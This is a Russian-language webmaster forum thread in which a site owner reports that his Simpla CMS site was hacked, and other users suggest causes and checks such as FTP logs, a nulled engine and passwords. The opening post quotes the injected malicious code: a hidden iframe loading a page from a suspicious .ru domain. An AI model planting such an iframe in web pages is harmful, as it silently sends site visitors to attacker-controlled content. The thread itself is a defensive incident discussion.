Форум Сайтостроение Безопасность

Взломали сайт на simpla

A
На сайте с 30.11.2005
Offline
193
azazelka
2323

Все привет,

сегодня обнаружили проблему, на сайте появился закодированный яваскрипт странного содержания, в конце которого есть вот такой айфрейм 

<iframe id="a1996667054" src="https://al9l235gkc7d.ru/f.html" style="display: none;"></iframe>

поиск гуглом выдает что таких сайтов много https://www.google.ru/?gws_rd=ssl#newwindow=1&q=al9l235gkc7d.ru%2Ff.html

но вот что за дыра послужила причиной не понятно((

сайт на simpla 2.1.5

totamon
На сайте с 12.05.2007
Offline
437
totamon
#1

а в чем вопрос?

Домены и хостинг https://8fn.ru/regru | Дедик от 3000р https://8fn.ru/73 | VPS в Москве https://8fn.ru/72 | Лучшие ВПС, ТП огонь, все страны! https://8fn.ru/inferno | ХОСТИНГ №1 РОССИИ https://8fn.ru/beget
A
На сайте с 30.11.2005
Offline
193
azazelka
#2

вопросы - может кто-то сталкивался с проблемой, судя по гуглу она достаточно массовая

LovelAss
На сайте с 05.06.2009
Offline
96
LovelAss
#3
azazelka:
может кто-то сталкивался с проблемой, судя по гуглу она достаточно массовая

Значится, судя по гуглу, что кто-то сталкивался. Вопрос-то в чём?

Оптимизайка
На сайте с 11.03.2012
Offline
396
Оптимизайка
#4
azazelka:
сайт на simpla 2.1.5

На какой странице появился этот код? На всех или на какой то конкретной? Были ли доработки симплы?

Что за хостинг?

Пароль на админку реально сложный?

Есть ли доступ через FTP к сайту? У кого он есть?

⭐ BotGuard (https://botguard.net) ⭐ — защита вашего сайта от вредоносных ботов, воровства контента, клонирования, спама и хакерских атак!
Чужой код на моих Кажись меня хотят взломать.Что Вопрос по ftp. Как
A
На сайте с 30.11.2005
Offline
193
azazelka
#5

Код появился на 40ка страницах

сервер выделенный там много проектов так что взлом сервера исключим потому что проблема на одном сайте только

FTP передавали подрядчика при разработке(

насчет брутфорса паролей - как вариант, но в логах подозрительно ничего нет

Кто то поставил сквозные Взломали фтп Какие e-mail взломать сложнее
Оптимизайка
На сайте с 11.03.2012
Offline
396
Оптимизайка
#6

Логи FTP, SSH просмотрите внимательно - кто когда заходил, и сверьте с реальными действиями сотрудников для начала.

totamon
На сайте с 12.05.2007
Offline
437
totamon
#7

судя по старой версии еще и движек нуленый? надо искать уязвимость, могла как и закладка быть в скрипте, так и уязвимость в версии, а может диверсия или с другого сайта спарсили... вам нужно специалиста искать, а не предположения на форуме...

UniHost.in.ua хостинг в Украине Продажа качественных сдл, порталов, DLE и кривые руки.
auditsaitov001
На сайте с 28.06.2015
Offline
11
auditsaitov001
#8
totamon:
судя по старой версии еще и движек нуленый? надо искать уязвимость, могла как и закладка быть в скрипте, так и уязвимость в версии, а может диверсия или с другого сайта спарсили... вам нужно специалиста искать, а не предположения на форуме...

Совершенно верно написано.

Надо попробовать обновить двиг для начала, удалить ифрейм, а если не помогает - искать дыру.

Аудит безопасности Вашего сайта квалифицированным специалистом по иб. Ручная проверка кода на уязвимости, поиск вирусов, вебшеллов и проч. Полная проверка, а не простое удаление вирусов.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий